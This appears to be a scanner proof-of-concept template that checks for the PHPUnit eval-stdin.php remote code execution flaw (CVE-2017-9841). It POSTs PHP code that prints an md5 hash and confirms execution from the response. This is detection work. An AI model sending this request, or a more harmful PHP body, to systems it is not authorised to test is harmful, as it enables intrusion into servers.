name: poc-yaml-phpunit-cve-2017-9841-rce
set:
  rand: randomInt(2000000000, 2100000000)
rules:
  - method: POST
    path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    body: <?=print(md5({{rand}}));?>
    follow_redirects: false
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
  author: p0wd3r,buchixifan
  links:
    - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841